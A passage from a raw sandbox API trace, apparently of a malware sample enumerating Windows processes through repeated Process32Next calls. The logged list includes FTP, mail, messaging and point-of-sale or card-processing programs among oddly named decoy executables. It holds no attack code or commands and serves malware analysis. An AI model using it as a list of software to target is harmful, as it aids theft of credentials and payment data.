th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.931] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0225.935] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0225.937] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0225.938] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0225.940] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0225.941] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0225.942] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0225.944] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0225.945] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.947] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.948] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0225.952] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.954] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.956] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.958] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.960] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.962] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.963] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.015] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0226.017] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0226.019] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0226.021] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.023] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0226.025] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0226.026] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0226.031] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0226.033] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0226.035] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.037] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0226.038] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0226.040] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0226.042] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0226.047] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0226.048] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0226.050] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0226.052] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0226.053] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0226.055] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0226.056] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0226.067] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0226.068] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0226.069] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0226.071] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0226.072] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0226.076] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0226.078] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0226.079] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0226.080] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0226.082] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0226.083] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0226.085] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0226.086] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0226.087] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0226.098] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0226.100] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0226.101] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0226.103] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0226.105] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0226.109] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0226.111] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0226.112] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0226.114] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0226.116] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0226.117] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0226.119] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0226.172] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0226.173] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0226.175] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0226.176] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0226.178] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0226.180] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0226.181] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0226.186] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0226.188] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0226.189] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0226.191] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0226.193] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0226.194] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0226.196] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0226.201] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0226.203] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0226.204] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0226.206] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0226.207] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, 